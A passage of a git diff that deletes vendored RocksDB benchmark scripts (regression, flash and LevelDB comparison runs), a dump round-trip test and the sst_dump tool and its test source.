-    $COMMIT_ID $1 $REMOTE_USER_AT_HOST $NUM_MULTI_DB $NUM_KEYS $KEY_SIZE $VALUE_SIZE \
-       $(multiply $COMPRESSION_RATIO 100) \
-       $3 $4 $CACHE_SIZE \
-       $MAX_BACKGROUND_FLUSHES $MAX_BACKGROUND_COMPACTIONS \
-       $ops_per_s \
-       $(multiply ${perc[0]} 1000) \
-       $(multiply ${perc[1]} 1000) \
-       $(multiply ${perc[2]} 1000) \
-       $(multiply ${perc[3]} 1000) \
-       $(multiply ${perc[4]} 1000) \
-       $DEBUG \
-       $real_sec \
-       $user_sec \
-       $sys_sec \
-       >> $SUMMARY_FILE)
-  exit_on_error $?
-}
-
-function exit_on_error {
-  if [ $1 -ne 0 ]; then
-    echo ""
-    echo "ERROR: Benchmark did not complete successfully."
-    if ! [ -z "$2" ]; then
-      echo "Failure command: $2"
-    fi
-    echo "Partial results are output to $RESULT_PATH"
-    echo "ERROR" >> $SUMMARY_FILE
-    exit $1
-  fi
-}
-
-function checkout_rocksdb {
-  echo "Checking out commit $1 ..."
-
-  git fetch --all
-  exit_on_error $?
-
-  git checkout $1
-  exit_on_error $?
-}
-
-function build_db_bench_and_ldb {
-  echo "Building db_bench & ldb ..."
-
-  make clean
-  exit_on_error $?
-
-  DEBUG_LEVEL=0 make db_bench ldb -j32
-  exit_on_error $?
-}
-
-function run_remote {
-  test_remote "$1"
-  exit_on_error $? "$1"
-}
-
-function test_remote {
-  if ! [ -z "$REMOTE_USER_AT_HOST" ]; then
-      cmd="$SSH $REMOTE_USER_AT_HOST '$1'"
-  else
-      cmd="$1"
-  fi
-  eval "$cmd"
-}
-
-function run_local {
-  eval "$1"
-  exit_on_error $?
-}
-
-function setup_options_file {
-  if ! [ -z "$OPTIONS_FILE" ]; then
-    if ! [ -z "$REMOTE_USER_AT_HOST" ]; then
-      options_file="$DB_BENCH_DIR/OPTIONS_FILE"
-      run_local "$SCP $OPTIONS_FILE $REMOTE_USER_AT_HOST:$options_file"
-    else
-      options_file="$OPTIONS_FILE"
-    fi
-    echo "--options_file=$options_file"
-  fi
-  echo ""
-}
-
-function setup_test_directory {
-  echo "Deleting old regression test directories and creating new ones"
-
-  run_remote "rm -rf $DB_PATH"
-  run_remote "rm -rf $DB_BENCH_DIR"
-  run_local "rm -rf $RESULT_PATH"
-
-  if ! [ -z "$WAL_PATH" ]; then
-    run_remote "rm -rf $WAL_PATH"
-    run_remote "mkdir -p $WAL_PATH"
-  fi
-
-  run_remote "mkdir -p $DB_PATH"
-
-  run_remote "mkdir -p $DB_BENCH_DIR"
-  run_remote "ls -l $DB_BENCH_DIR"
-
-  if ! [ -z "$REMOTE_USER_AT_HOST" ]; then
-      run_local "$SCP ./db_bench $REMOTE_USER_AT_HOST:$DB_BENCH_DIR/db_bench"
-      run_local "$SCP ./ldb $REMOTE_USER_AT_HOST:$DB_BENCH_DIR/ldb"
-  fi
-
-  run_local "mkdir -p $RESULT_PATH"
-
-  (printf $TITLE_FORMAT \
-      "commit id" "benchmark" "user@host" "num-dbs" "key-range" "key-size" \
-      "value-size" "compress-rate" "ops-per-thread" "num-threads" "cache-size" \
-      "flushes" "compactions" \
-      "ops-per-s" "p50" "p75" "p99" "p99.9" "p99.99" "debug" \
-      "real-sec" "user-sec" "sys-sec" \
-      >> $SUMMARY_FILE)
-  exit_on_error $?
-}
-
-function cleanup_test_directory {
-
-  if [ $DELETE_TEST_PATH -ne 0 ]; then
-    echo "Clear old regression test directories and creating new ones"
-    run_remote "rm -rf $DB_PATH"
-    run_remote "rm -rf $WAL_PATH"
-    if ! [ -z "$REMOTE_USER_AT_HOST" ]; then
-      run_remote "rm -rf $DB_BENCH_DIR"
-    fi
-    run_remote "rm -rf $1"
-  else
-    echo "------------ DEBUG MODE ------------"
-    echo "DB  PATH: $DB_PATH"
-    echo "WAL PATH: $WAL_PATH"
-  fi
-}
-
-############################################################################
-
-main $@
diff --git a/thirdparty/rocksdb/tools/rocksdb_dump_test.sh b/thirdparty/rocksdb/tools/rocksdb_dump_test.sh
deleted file mode 100755
index 2cf8c06..0000000
--- a/thirdparty/rocksdb/tools/rocksdb_dump_test.sh
+++ /dev/null
@@ -1,7 +0,0 @@
-TESTDIR=`mktemp -d ${TMPDIR:-/tmp}/rocksdb-dump-test.XXXXX`
-DUMPFILE="tools/sample-dump.dmp"
-
-# Verify that the sample dump file is undumpable and then redumpable.
-./rocksdb_undump --dump_location=$DUMPFILE --db_path=$TESTDIR/db
-./rocksdb_dump --anonymous --db_path=$TESTDIR/db --dump_location=$TESTDIR/dump
-cmp $DUMPFILE $TESTDIR/dump
diff --git a/thirdparty/rocksdb/tools/run_flash_bench.sh b/thirdparty/rocksdb/tools/run_flash_bench.sh
deleted file mode 100755
index 4d9d0d5..0000000
--- a/thirdparty/rocksdb/tools/run_flash_bench.sh
+++ /dev/null
@@ -1,358 +0,0 @@
-#!/usr/bin/env bash
-# REQUIRE: benchmark.sh exists in the current directory
-# After execution of this script, log files are generated in $output_dir.
-# report.txt provides a high level statistics
-
-# This should be run from the parent of the tools directory. The command line is:
-#   [$env_vars] tools/run_flash_bench.sh [list-of-threads]
-#
-# This runs a sequence of tests in the following sequence:
-#   step 1) load - bulkload, compact, fillseq, overwrite
-#   step 2) read-only for each number of threads
-#   step 3) read-write for each number of threads
-#   step 4) merge for each number of threads
-#
-# The list of threads is optional and when not set is equivalent to "24". 
-# Were list-of-threads specified as "1 2 4" then the tests in steps 2, 3 and
-# 4 above would be repeated for 1, 2 and 4 threads. The tests in step 1 are
-# only run for 1 thread.
-
-# Test output is written to $OUTPUT_DIR, currently /tmp/output. The performance
-# summary is in $OUTPUT_DIR/report.txt. There is one file in $OUTPUT_DIR per
-# test and the tests are listed below.
-#
-# The environment variables are also optional. The variables are:
-#
-#   NKEYS         - number of key/value pairs to load
-#   BG_MBWRITEPERSEC - write rate limit in MB/second for tests in which
-#                   there is one thread doing writes and stats are
-#                   reported for read threads. "BG" stands for background.
-#                   If this is too large then the non-writer threads can get
-#                   starved. This is used for the "readwhile" tests.
-#   FG_MBWRITEPERSEC - write rate limit in MB/second for tests like overwrite
-#                   where stats are reported for the write threads.
-#   NSECONDS      - number of seconds for which to run each test in steps 2,
-#                   3 and 4. There are currently 15 tests in those steps and
-#                   they are repeated for each entry in list-of-threads so
-#                   this variable lets you control the total duration to
-#                   finish the benchmark.
-#   RANGE_LIMIT   - the number of rows to read per range query for tests that
-#                   do range queries.
-#   VAL_SIZE      - the length of the value in the key/value pairs loaded.
-#                   You can estimate the size of the test database from this,
-#                   NKEYS and the compression rate (--compression_ratio) set
-#                   in tools/benchmark.sh
-#   BLOCK_LENGTH  - value for db_bench --block_size
-#   CACHE_BYTES   - the size of the RocksDB block cache in bytes
-#   DATA_DIR      - directory in which to create database files
-#   LOG_DIR       - directory in which to create WAL files, may be the same
-#                   as DATA_DIR
-#   DO_SETUP      - when set to 0 then a backup of the database is copied from
-#                   $DATA_DIR.bak to $DATA_DIR and the load tests from step 1
-#                   The WAL directory is also copied from a backup if
-#                   DATA_DIR != LOG_DIR. This allows tests from steps 2, 3, 4
-#                   to be repeated faster.
-#   SAVE_SETUP    - saves a copy of the database at the end of step 1 to
-#                   $DATA_DIR.bak. When LOG_DIR != DATA_DIR then it is copied
-#                   to $LOG_DIR.bak.
-#   SKIP_LOW_PRI_TESTS - skip some of the tests which aren't crucial for getting
-#                   actionable benchmarking data (look for keywords "bulkload",
-#                   "sync=1", and "while merging").
-#
-
-# Size constants
-K=1024
-M=$((1024 * K))
-G=$((1024 * M))
-
-num_keys=${NKEYS:-$((1 * G))}
-# write rate for readwhile... tests
-bg_mbwps=${BG_MBWRITEPERSEC:-4}
-# write rate for tests other than readwhile, 0 means no limit
-fg_mbwps=${FG_MBWRITEPERSEC:-0}
-duration=${NSECONDS:-$((60 * 60))}
-nps=${RANGE_LIMIT:-10}
-vs=${VAL_SIZE:-400}
-cs=${CACHE_BYTES:-$(( 1 * G ))}
-bs=${BLOCK_LENGTH:-8192}
-
-# If no command line arguments then run for 24 threads.
-if [[ $# -eq 0 ]]; then
-  nthreads=( 24 )
-else
-  nthreads=( "$@" )
-fi
-
-for num_thr in "${nthreads[@]}" ; do
-  echo Will run for $num_thr threads
-done
-
-# Update these parameters before execution !!!
-db_dir=${DATA_DIR:-"/tmp/rocksdb/"}
-wal_dir=${LOG_DIR:-"/tmp/rocksdb/"}
-
-do_setup=${DO_SETUP:-1}
-save_setup=${SAVE_SETUP:-0}
-
-# By default we'll run all the tests. Set this to skip a set of tests which
-# aren't critical for getting key metrics.
-skip_low_pri_tests=${SKIP_LOW_PRI_TESTS:-0}
-
-if [[ $skip_low_pri_tests == 1 ]]; then
-  echo "Skipping some non-critical tests because SKIP_LOW_PRI_TESTS is set."
-fi
-
-output_dir="${TMPDIR:-/tmp}/output"
-
-ARGS="\
-OUTPUT_DIR=$output_dir \
-NUM_KEYS=$num_keys \
-DB_DIR=$db_dir \
-WAL_DIR=$wal_dir \
-VALUE_SIZE=$vs \
-BLOCK_SIZE=$bs \
-CACHE_SIZE=$cs"
-
-mkdir -p $output_dir
-echo -e "ops/sec\tmb/sec\tSize-GB\tL0_GB\tSum_GB\tW-Amp\tW-MB/s\tusec/op\tp50\tp75\tp99\tp99.9\tp99.99\tUptime\tStall-time\tStall%\tTest" \
-  > $output_dir/report.txt
-
-# Notes on test sequence:
-#   step 1) Setup database via sequential fill followed by overwrite to fragment it.
-#           Done without setting DURATION to make sure that overwrite does $num_keys writes
-#   step 2) read-only tests for all levels of concurrency requested
-#   step 3) non read-only tests for all levels of concurrency requested
-#   step 4) merge tests for all levels of concurrency requested. These must come last.
-
-###### Setup the database
-
-if [[ $do_setup != 0 ]]; then
-  echo Doing setup
-
-  if [[ $skip_low_pri_tests != 1 ]]; then
-    # Test 1: bulk load
-    env $ARGS ./tools/benchmark.sh bulkload
-  fi
-
-  # Test 2a: sequential fill with large values to get peak ingest
-  #          adjust NUM_KEYS given the use of larger values
-  env $ARGS BLOCK_SIZE=$((1 * M)) VALUE_SIZE=$((32 * K)) NUM_KEYS=$(( num_keys / 64 )) \
-       ./tools/benchmark.sh fillseq_disable_wal
-
-  # Test 2b: sequential fill with the configured value size
-  env $ARGS ./tools/benchmark.sh fillseq_disable_wal
-
-  # Test 2c: same as 2a, but with WAL being enabled.
-  env $ARGS BLOCK_SIZE=$((1 * M)) VALUE_SIZE=$((32 * K)) NUM_KEYS=$(( num_keys / 64 )) \
-       ./tools/benchmark.sh fillseq_enable_wal
-
-  # Test 2d: same as 2b, but with WAL being enabled.
-  env $ARGS ./tools/benchmark.sh fillseq_enable_wal
-
-  # Test 3: single-threaded overwrite
-  env $ARGS NUM_THREADS=1 DB_BENCH_NO_SYNC=1 ./tools/benchmark.sh overwrite
-
-else
-  echo Restoring from backup
-
-  rm -rf $db_dir
-
-  if [ ! -d ${db_dir}.bak ]; then
-    echo Database backup does not exist at ${db_dir}.bak
-    exit -1
-  fi
-
-  echo Restore database from ${db_dir}.bak
-  cp -p -r ${db_dir}.bak $db_dir
-
-  if [[ $db_dir != $wal_dir ]]; then
-    rm -rf $wal_dir
-
-    if [ ! -d ${wal_dir}.bak ]; then
-      echo WAL backup does not exist at ${wal_dir}.bak
-      exit -1
-    fi
-
-    echo Restore WAL from ${wal_dir}.bak
-    cp -p -r ${wal_dir}.bak $wal_dir
-  fi
-fi
-
-if [[ $save_setup != 0 ]]; then
-  echo Save database to ${db_dir}.bak
-  cp -p -r $db_dir ${db_dir}.bak
-
-  if [[ $db_dir != $wal_dir ]]; then
-    echo Save WAL to ${wal_dir}.bak
-    cp -p -r $wal_dir ${wal_dir}.bak
-  fi
-fi
-
-###### Read-only tests
-
-for num_thr in "${nthreads[@]}" ; do
-  # Test 4: random read
-  env $ARGS DURATION=$duration NUM_THREADS=$num_thr ./tools/benchmark.sh readrandom
-
-  # Test 5: random range scans
-  env $ARGS DURATION=$duration NUM_THREADS=$num_thr NUM_NEXTS_PER_SEEK=$nps \
-    ./tools/benchmark.sh fwdrange
-
-  # Test 6: random reverse range scans
-  env $ARGS DURATION=$duration NUM_THREADS=$num_thr NUM_NEXTS_PER_SEEK=$nps \
-    ./tools/benchmark.sh revrange
-done
-
-###### Non read-only tests
-
-for num_thr in "${nthreads[@]}" ; do
-  # Test 7: overwrite with sync=0
-  env $ARGS DURATION=$duration NUM_THREADS=$num_thr MB_WRITE_PER_SEC=$fg_mbwps \
-    DB_BENCH_NO_SYNC=1 ./tools/benchmark.sh overwrite
-
-  if [[ $skip_low_pri_tests != 1 ]]; then
-    # Test 8: overwrite with sync=1
-    env $ARGS DURATION=$duration NUM_THREADS=$num_thr MB_WRITE_PER_SEC=$fg_mbwps \
-      ./tools/benchmark.sh overwrite
-  fi
-
-  # Test 9: random update with sync=0
-  env $ARGS DURATION=$duration NUM_THREADS=$num_thr DB_BENCH_NO_SYNC=1 \
-      ./tools/benchmark.sh updaterandom
-
-  if [[ $skip_low_pri_tests != 1 ]]; then
-    # Test 10: random update with sync=1
-   env $ARGS DURATION=$duration NUM_THREADS=$num_thr ./tools/benchmark.sh updaterandom
-  fi
-
-  # Test 11: random read while writing
-  env $ARGS DURATION=$duration NUM_THREADS=$num_thr MB_WRITE_PER_SEC=$bg_mbwps \
-    DB_BENCH_NO_SYNC=1 ./tools/benchmark.sh readwhilewriting
-
-  # Test 12: range scan while writing
-  env $ARGS DURATION=$duration NUM_THREADS=$num_thr MB_WRITE_PER_SEC=$bg_mbwps \
-    DB_BENCH_NO_SYNC=1 NUM_NEXTS_PER_SEEK=$nps ./tools/benchmark.sh fwdrangewhilewriting
-
-  # Test 13: reverse range scan while writing
-  env $ARGS DURATION=$duration NUM_THREADS=$num_thr MB_WRITE_PER_SEC=$bg_mbwps \
-    DB_BENCH_NO_SYNC=1 NUM_NEXTS_PER_SEEK=$nps ./tools/benchmark.sh revrangewhilewriting
-done
-
-###### Merge tests
-
-for num_thr in "${nthreads[@]}" ; do
-  # Test 14: random merge with sync=0
-  env $ARGS DURATION=$duration NUM_THREADS=$num_thr MB_WRITE_PER_SEC=$fg_mbwps \
-    DB_BENCH_NO_SYNC=1 ./tools/benchmark.sh mergerandom
-
-  if [[ $skip_low_pri_tests != 1 ]]; then
-    # Test 15: random merge with sync=1
-    env $ARGS DURATION=$duration NUM_THREADS=$num_thr MB_WRITE_PER_SEC=$fg_mbwps \
-      ./tools/benchmark.sh mergerandom
-
-    # Test 16: random read while merging 
-    env $ARGS DURATION=$duration NUM_THREADS=$num_thr MB_WRITE_PER_SEC=$bg_mbwps \
-      DB_BENCH_NO_SYNC=1 ./tools/benchmark.sh readwhilemerging
-
-    # Test 17: range scan while merging 
-    env $ARGS DURATION=$duration NUM_THREADS=$num_thr MB_WRITE_PER_SEC=$bg_mbwps \
-      DB_BENCH_NO_SYNC=1 NUM_NEXTS_PER_SEEK=$nps ./tools/benchmark.sh fwdrangewhilemerging
-
-    # Test 18: reverse range scan while merging 
-    env $ARGS DURATION=$duration NUM_THREADS=$num_thr MB_WRITE_PER_SEC=$bg_mbwps \
-      DB_BENCH_NO_SYNC=1 NUM_NEXTS_PER_SEEK=$nps ./tools/benchmark.sh revrangewhilemerging
-  fi
-done
-
-###### Universal compaction tests.
-
-# Use a single thread to reduce the variability in the benchmark.
-env $ARGS COMPACTION_TEST=1 NUM_THREADS=1 ./tools/benchmark.sh universal_compaction
-
-if [[ $skip_low_pri_tests != 1 ]]; then
-  echo bulkload > $output_dir/report2.txt
-  head -1 $output_dir/report.txt >> $output_dir/report2.txt
-  grep bulkload $output_dir/report.txt >> $output_dir/report2.txt
-fi
-
-echo fillseq_wal_disabled >> $output_dir/report2.txt
-head -1 $output_dir/report.txt >> $output_dir/report2.txt
-grep fillseq.wal_disabled $output_dir/report.txt >> $output_dir/report2.txt
-
-echo fillseq_wal_enabled >> $output_dir/report2.txt
-head -1 $output_dir/report.txt >> $output_dir/report2.txt
-grep fillseq.wal_enabled $output_dir/report.txt >> $output_dir/report2.txt
-
-echo overwrite sync=0 >> $output_dir/report2.txt
-head -1 $output_dir/report.txt >> $output_dir/report2.txt
-grep overwrite $output_dir/report.txt | grep \.s0  >> $output_dir/report2.txt
-
-if [[ $skip_low_pri_tests != 1 ]]; then
-  echo overwrite sync=1 >> $output_dir/report2.txt
-  head -1 $output_dir/report.txt >> $output_dir/report2.txt
-  grep overwrite $output_dir/report.txt | grep \.s1  >> $output_dir/report2.txt
-fi
-
-echo updaterandom sync=0 >> $output_dir/report2.txt
-head -1 $output_dir/report.txt >> $output_dir/report2.txt
-grep updaterandom $output_dir/report.txt | grep \.s0 >> $output_dir/report2.txt
-
-if [[ $skip_low_pri_tests != 1 ]]; then
-  echo updaterandom sync=1 >> $output_dir/report2.txt
-  head -1 $output_dir/report.txt >> $output_dir/report2.txt
-  grep updaterandom $output_dir/report.txt | grep \.s1 >> $output_dir/report2.txt
-fi
-
-echo mergerandom sync=0 >> $output_dir/report2.txt
-head -1 $output_dir/report.txt >> $output_dir/report2.txt
-grep mergerandom $output_dir/report.txt | grep \.s0 >> $output_dir/report2.txt
-
-if [[ $skip_low_pri_tests != 1 ]]; then
-  echo mergerandom sync=1 >> $output_dir/report2.txt
-  head -1 $output_dir/report.txt >> $output_dir/report2.txt
-  grep mergerandom $output_dir/report.txt | grep \.s1 >> $output_dir/report2.txt
-fi
-
-echo readrandom >> $output_dir/report2.txt
-head -1 $output_dir/report.txt >> $output_dir/report2.txt
-grep readrandom $output_dir/report.txt  >> $output_dir/report2.txt
-
-echo fwdrange >> $output_dir/report2.txt
-head -1 $output_dir/report.txt >> $output_dir/report2.txt
-grep fwdrange\.t $output_dir/report.txt >> $output_dir/report2.txt
-
-echo revrange >> $output_dir/report2.txt
-head -1 $output_dir/report.txt >> $output_dir/report2.txt
-grep revrange\.t $output_dir/report.txt >> $output_dir/report2.txt
-
-echo readwhile >> $output_dir/report2.txt >> $output_dir/report2.txt
-head -1 $output_dir/report.txt >> $output_dir/report2.txt
-grep readwhilewriting $output_dir/report.txt >> $output_dir/report2.txt
-
-if [[ $skip_low_pri_tests != 1 ]]; then
-  echo readwhile >> $output_dir/report2.txt
-  head -1 $output_dir/report.txt >> $output_dir/report2.txt
-  grep readwhilemerging $output_dir/report.txt >> $output_dir/report2.txt
-fi
-
-echo fwdreadwhilewriting >> $output_dir/report2.txt
-head -1 $output_dir/report.txt >> $output_dir/report2.txt
-grep fwdrangewhilewriting $output_dir/report.txt >> $output_dir/report2.txt
-
-if [[ $skip_low_pri_tests != 1 ]]; then
-  echo fwdreadwhilemerging >> $output_dir/report2.txt
-  head -1 $output_dir/report.txt >> $output_dir/report2.txt
-  grep fwdrangewhilemerg $output_dir/report.txt >> $output_dir/report2.txt
-fi
-
-echo revreadwhilewriting >> $output_dir/report2.txt
-head -1 $output_dir/report.txt >> $output_dir/report2.txt
-grep revrangewhilewriting $output_dir/report.txt >> $output_dir/report2.txt
-
-if [[ $skip_low_pri_tests != 1 ]]; then
-  echo revreadwhilemerging >> $output_dir/report2.txt
-  head -1 $output_dir/report.txt >> $output_dir/report2.txt
-  grep revrangewhilemerg $output_dir/report.txt >> $output_dir/report2.txt
-fi
-
-cat $output_dir/report2.txt
diff --git a/thirdparty/rocksdb/tools/run_leveldb.sh b/thirdparty/rocksdb/tools/run_leveldb.sh
deleted file mode 100755
index de628c3..0000000
--- a/thirdparty/rocksdb/tools/run_leveldb.sh
+++ /dev/null
@@ -1,174 +0,0 @@
-#!/usr/bin/env bash
-# REQUIRE: benchmark_leveldb.sh exists in the current directory
-# After execution of this script, log files are generated in $output_dir.
-# report.txt provides a high level statistics
-#
-# This should be used with the LevelDB fork listed here to use additional test options.
-# For more details on the changes see the blog post listed below.
-#   https://github.com/mdcallag/leveldb-1
-#   http://smalldatum.blogspot.com/2015/04/comparing-leveldb-and-rocksdb-take-2.html
-#
-# This should be run from the parent of the tools directory. The command line is:
-#   [$env_vars] tools/run_flash_bench.sh [list-of-threads]
-#
-# This runs a sequence of tests in the following sequence:
-#   step 1) load - bulkload, compact, fillseq, overwrite
-#   step 2) read-only for each number of threads
-#   step 3) read-write for each number of threads
-#
-# The list of threads is optional and when not set is equivalent to "24". 
-# Were list-of-threads specified as "1 2 4" then the tests in steps 2, 3 and
-# 4 above would be repeated for 1, 2 and 4 threads. The tests in step 1 are
-# only run for 1 thread.
-
-# Test output is written to $OUTPUT_DIR, currently /tmp/output. The performance
-# summary is in $OUTPUT_DIR/report.txt. There is one file in $OUTPUT_DIR per
-# test and the tests are listed below.
-#
-# The environment variables are also optional. The variables are:
-#   NKEYS         - number of key/value pairs to load
-#   NWRITESPERSEC - the writes/second rate limit for the *whilewriting* tests.
-#                   If this is too large then the non-writer threads can get
-#                   starved.
-#   VAL_SIZE      - the length of the value in the key/value pairs loaded.
-#                   You can estimate the size of the test database from this,
-#                   NKEYS and the compression rate (--compression_ratio) set
-#                   in tools/benchmark_leveldb.sh
-#   BLOCK_LENGTH  - value for db_bench --block_size
-#   CACHE_BYTES   - the size of the RocksDB block cache in bytes
-#   DATA_DIR      - directory in which to create database files
-#   DO_SETUP      - when set to 0 then a backup of the database is copied from
-#                   $DATA_DIR.bak to $DATA_DIR and the load tests from step 1
-#                   This allows tests from steps 2, 3 to be repeated faster.
-#   SAVE_SETUP    - saves a copy of the database at the end of step 1 to
-#                   $DATA_DIR.bak.
-
-# Size constants
-K=1024
-M=$((1024 * K))
-G=$((1024 * M))
-
-num_keys=${NKEYS:-$((1 * G))}
-wps=${NWRITESPERSEC:-$((10 * K))}
-vs=${VAL_SIZE:-400}
-cs=${CACHE_BYTES:-$(( 1 * G ))}
-bs=${BLOCK_LENGTH:-4096}
-
-# If no command line arguments then run for 24 threads.
-if [[ $# -eq 0 ]]; then
-  nthreads=( 24 )
-else
-  nthreads=( "$@" )
-fi
-
-for num_thr in "${nthreads[@]}" ; do
-  echo Will run for $num_thr threads
-done
-
-# Update these parameters before execution !!!
-db_dir=${DATA_DIR:-"/tmp/rocksdb/"}
-
-do_setup=${DO_SETUP:-1}
-save_setup=${SAVE_SETUP:-0}
-
-output_dir="${TMPDIR:-/tmp}/output"
-
-ARGS="\
-OUTPUT_DIR=$output_dir \
-NUM_KEYS=$num_keys \
-DB_DIR=$db_dir \
-VALUE_SIZE=$vs \
-BLOCK_SIZE=$bs \
-CACHE_SIZE=$cs"
-
-mkdir -p $output_dir
-echo -e "ops/sec\tmb/sec\tusec/op\tavg\tp50\tTest" \
-  > $output_dir/report.txt
-
-# Notes on test sequence:
-#   step 1) Setup database via sequential fill followed by overwrite to fragment it.
-#           Done without setting DURATION to make sure that overwrite does $num_keys writes
-#   step 2) read-only tests for all levels of concurrency requested
-#   step 3) non read-only tests for all levels of concurrency requested
-
-###### Setup the database
-
-if [[ $do_setup != 0 ]]; then
-  echo Doing setup
-
-  # Test 2a: sequential fill with large values to get peak ingest
-  #          adjust NUM_KEYS given the use of larger values
-  env $ARGS BLOCK_SIZE=$((1 * M)) VALUE_SIZE=$((32 * K)) NUM_KEYS=$(( num_keys / 64 )) \
-       ./tools/benchmark_leveldb.sh fillseq
-
-  # Test 2b: sequential fill with the configured value size
-  env $ARGS ./tools/benchmark_leveldb.sh fillseq
-
-  # Test 3: single-threaded overwrite
-  env $ARGS NUM_THREADS=1 DB_BENCH_NO_SYNC=1 ./tools/benchmark_leveldb.sh overwrite
-
-else
-  echo Restoring from backup
-
-  rm -rf $db_dir
-
-  if [ ! -d ${db_dir}.bak ]; then
-    echo Database backup does not exist at ${db_dir}.bak
-    exit -1
-  fi
-
-  echo Restore database from ${db_dir}.bak
-  cp -p -r ${db_dir}.bak $db_dir
-fi
-
-if [[ $save_setup != 0 ]]; then
-  echo Save database to ${db_dir}.bak
-  cp -p -r $db_dir ${db_dir}.bak
-fi
-
-###### Read-only tests
-
-for num_thr in "${nthreads[@]}" ; do
-  # Test 4: random read
-  env $ARGS NUM_THREADS=$num_thr ./tools/benchmark_leveldb.sh readrandom
-
-done
-
-###### Non read-only tests
-
-for num_thr in "${nthreads[@]}" ; do
-  # Test 7: overwrite with sync=0
-  env $ARGS NUM_THREADS=$num_thr DB_BENCH_NO_SYNC=1 \
-    ./tools/benchmark_leveldb.sh overwrite
-
-  # Test 8: overwrite with sync=1
-  # Not run for now because LevelDB db_bench doesn't have an option to limit the
-  # test run to X seconds and doing sync-per-commit for --num can take too long.
-  # env $ARGS NUM_THREADS=$num_thr ./tools/benchmark_leveldb.sh overwrite
-
-  # Test 11: random read while writing
-  env $ARGS NUM_THREADS=$num_thr WRITES_PER_SECOND=$wps \
-    ./tools/benchmark_leveldb.sh readwhilewriting
-
-done
-
-echo bulkload > $output_dir/report2.txt
-head -1 $output_dir/report.txt >> $output_dir/report2.txt
-grep bulkload $output_dir/report.txt >> $output_dir/report2.txt
-echo fillseq >> $output_dir/report2.txt
-head -1 $output_dir/report.txt >> $output_dir/report2.txt
-grep fillseq $output_dir/report.txt >> $output_dir/report2.txt
-echo overwrite sync=0 >> $output_dir/report2.txt
-head -1 $output_dir/report.txt >> $output_dir/report2.txt
-grep overwrite $output_dir/report.txt | grep \.s0  >> $output_dir/report2.txt
-echo overwrite sync=1 >> $output_dir/report2.txt
-head -1 $output_dir/report.txt >> $output_dir/report2.txt
-grep overwrite $output_dir/report.txt | grep \.s1  >> $output_dir/report2.txt
-echo readrandom >> $output_dir/report2.txt
-head -1 $output_dir/report.txt >> $output_dir/report2.txt
-grep readrandom $output_dir/report.txt  >> $output_dir/report2.txt
-echo readwhile >> $output_dir/report2.txt >> $output_dir/report2.txt
-head -1 $output_dir/report.txt >> $output_dir/report2.txt
-grep readwhilewriting $output_dir/report.txt >> $output_dir/report2.txt
-
-cat $output_dir/report2.txt
diff --git a/thirdparty/rocksdb/tools/sample-dump.dmp b/thirdparty/rocksdb/tools/sample-dump.dmp
deleted file mode 100644
index 4ec3a77..0000000
--- a/thirdparty/rocksdb/tools/sample-dump.dmp
+++ /dev/null
Binary files differ
diff --git a/thirdparty/rocksdb/tools/sst_dump.cc b/thirdparty/rocksdb/tools/sst_dump.cc
deleted file mode 100644
index 617d758..0000000
--- a/thirdparty/rocksdb/tools/sst_dump.cc
+++ /dev/null
@@ -1,21 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-#ifndef ROCKSDB_LITE
-
-#include "rocksdb/sst_dump_tool.h"
-
-int main(int argc, char** argv) {
-  rocksdb::SSTDumpTool tool;
-  tool.Run(argc, argv);
-  return 0;
-}
-#else
-#include <stdio.h>
-int main(int argc, char** argv) {
-  fprintf(stderr, "Not supported in lite mode.\n");
-  return 1;
-}
-#endif  // ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/tools/sst_dump_test.cc b/thirdparty/rocksdb/tools/sst_dump_test.cc
deleted file mode 100644
index 460b5a2..0000000
--- a/thirdparty/rocksdb/tools/sst_dump_test.cc
+++ /dev/null
@@ -1,223 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2012 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#ifndef ROCKSDB_LITE
-
-#include <stdint.h>
-#include "rocksdb/sst_dump_tool.h"
-
-#include "rocksdb/filter_policy.h"
-#include "table/block_based_table_factory.h"
-#include "table/table_builder.h"
-#include "util/file_reader_writer.h"
-#include "util/testharness.h"
-#include "util/testutil.h"
-
-namespace rocksdb {
-
-const uint32_t optLength = 100;
-
-namespace {
-static std::string MakeKey(int i) {
-  char buf[100];
-  snprintf(buf, sizeof(buf), "k_%04d", i);
-  InternalKey key(std::string(buf), 0, ValueType::kTypeValue);
-  return key.Encode().ToString();
-}
-
-static std::string MakeValue(int i) {
-  char buf[100];
-  snprintf(buf, sizeof(buf), "v_%04d", i);
-  InternalKey key(std::string(buf), 0, ValueType::kTypeValue);
-  return key.Encode().ToString();
-}
-
-void createSST(const std::string& file_name,
-               const BlockBasedTableOptions& table_options) {
-  std::shared_ptr<rocksdb::TableFactory> tf;
-  tf.reset(new rocksdb::BlockBasedTableFactory(table_options));
-
-  unique_ptr<WritableFile> file;
-  Env* env = Env::Default();
-  EnvOptions env_options;
-  ReadOptions read_options;
-  Options opts;
-  const ImmutableCFOptions imoptions(opts);
-  rocksdb::InternalKeyComparator ikc(opts.comparator);
-  unique_ptr<TableBuilder> tb;
-
-  env->NewWritableFile(file_name, &file, env_options);
-  opts.table_factory = tf;
-  std::vector<std::unique_ptr<IntTblPropCollectorFactory> >
-      int_tbl_prop_collector_factories;
-  unique_ptr<WritableFileWriter> file_writer(
-      new WritableFileWriter(std::move(file), EnvOptions()));
-  std::string column_family_name;
-  int unknown_level = -1;
-  tb.reset(opts.table_factory->NewTableBuilder(
-      TableBuilderOptions(imoptions, ikc, &int_tbl_prop_collector_factories,
-                          CompressionType::kNoCompression, CompressionOptions(),
-                          nullptr /* compression_dict */,
-                          false /* skip_filters */, column_family_name,
-                          unknown_level),
-      TablePropertiesCollectorFactory::Context::kUnknownColumnFamily,
-      file_writer.get()));
-
-  // Populate slightly more than 1K keys
-  uint32_t num_keys = 1024;
-  for (uint32_t i = 0; i < num_keys; i++) {
-    tb->Add(MakeKey(i), MakeValue(i));
-  }
-  tb->Finish();
-  file_writer->Close();
-}
-
-void cleanup(const std::string& file_name) {
